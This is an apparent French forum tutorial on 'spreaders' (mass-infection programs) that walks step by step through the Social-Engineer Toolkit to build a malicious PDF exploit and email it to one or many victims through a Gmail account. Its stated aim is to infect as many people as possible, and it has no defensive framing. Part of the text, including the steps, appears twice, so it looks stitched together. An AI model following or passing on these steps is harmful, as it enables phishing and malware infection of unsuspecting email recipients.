Comment spread avec un pdf est tout sa par émail avec l'outil SET ?
Les Spreaders sont des programmes d'infection de masse.
Les premières méthodes de spread apparurent dans les worms (ou "vers") en français ; c'était des virus généralement en VBscript .VBS
Certains se souviendront peut-être du fameux "I LOVE YOU", qui infectait les fichiers audios et vidéos et qui utilisait la méthode de propagation par mail.
Tous les spreaders ont un seul but. Infecter un maximum de personne en très peu de temps.
Bon alors pour ouvrir un "shell", depuis une interface graphique, tu peux (si KDE) cliquer sur un icône qui ressemble à un "coquillage" (shell en anglais), mais le plus simple est encore de basculer dans un "console virtuelle" (TTY), pour ça, il faut faire :
CTRL + ALT + F1
(ou F2 ou F3....jusqu'à F6)
Pour revenir sur le serveur X, tu tapes :
ALT + F7
Pour créer un fichier, tu fais :touch le_fichierou "le_fichier" est le nom que tu veux donner à ton fichier.
1) Ouvrez un Shell et tapez :
cd /pentest/exploits/SET
2) Puis :./set
Vous aurez cela :
3) Tapez 1 , puis 2.
Create a FileFormat Payload
4) Puis un de c'est choix :
15. Adobe PDF Embedded EXE Social Engineering (NOJS)
16. Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17. Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
Je vais prendre 17 en exemple .
Ensuite 2
5) Entrez votre Port ou cliquez ENTER pour default .
[*] Generating fileformat exploit...
6) Tapez 1 pour laissez le nom du fichier en moo.pdf
7) Ensuite tapez 1 pour envoyer a un seul email ou 2 pour plusieurs email ( vous devez faire un fichier txt avec les email )
Donc moi je vais tapez 1
8) Ensuite tapez 1 pour avoir un message template déjà fait dans le mail est 2 pour l'écrire .
Je tapez donc 1 .. puis ensuite je choisi le message .
9) Ensuite tapez l'émail de réception :
10) Tapez 1 si vous souhaitez utilisée un GMAIL ou 2 pour un Relais .
Tapez 1 pour suivre le tutoriel .
11) Entrez votre adresse gmail , votre Mot de Passe , est voila le mail est envoyez avec succès , tapez yes or no pour voir les connections .
Bon alors pour ouvrir un "shell", depuis une interface graphique, tu peux (si KDE) cliquer sur un icône qui ressemble à un "coquillage" (shell en anglais), mais le plus simple est encore de basculer dans un "console virtuelle" (TTY), pour ça, il faut faire :
CTRL + ALT + F1
(ou F2 ou F3....jusqu'à F6)
Pour revenir sur le serveur X, tu tapes :
ALT + F7
Pour créer un fichier, tu fais :touch le_fichierou "le_fichier" est le nom que tu veux donner à ton fichier.
1) Ouvrez un Shell et tapez :
cd /pentest/exploits/SET
3) Tapez 1 , puis 2.
Create a FileFormat Payload
15. Adobe PDF Embedded EXE Social Engineering (NOJS)
16. Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17. Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
Je vais prendre 17 en exemple .
Ensuite 2
[*] Generating fileformat exploit...
6) Tapez 1 pour laissez le nom du fichier en moo.pdf
7) Ensuite tapez 1 pour envoyer a un seul email ou 2 pour plusieurs email ( vous devez faire un fichier txt avec les email )
Donc moi je vais tapez 1
8) Ensuite tapez 1 pour avoir un message template déjà fait dans le mail est 2 pour l'écrire .
Je tapez donc 1 .. puis ensuite je choisi le message .
9) Ensuite tapez l'émail de réception :
10) Tapez 1 si vous souhaitez utilisée un GMAIL ou 2 pour un Relais .
Tapez 1 pour suivre le tutoriel .
11) Entrez votre adresse gmail , votre Mot de Passe , est voila le mail est envoyez avec succès , tapez yes or no pour voir les connections .
Articles
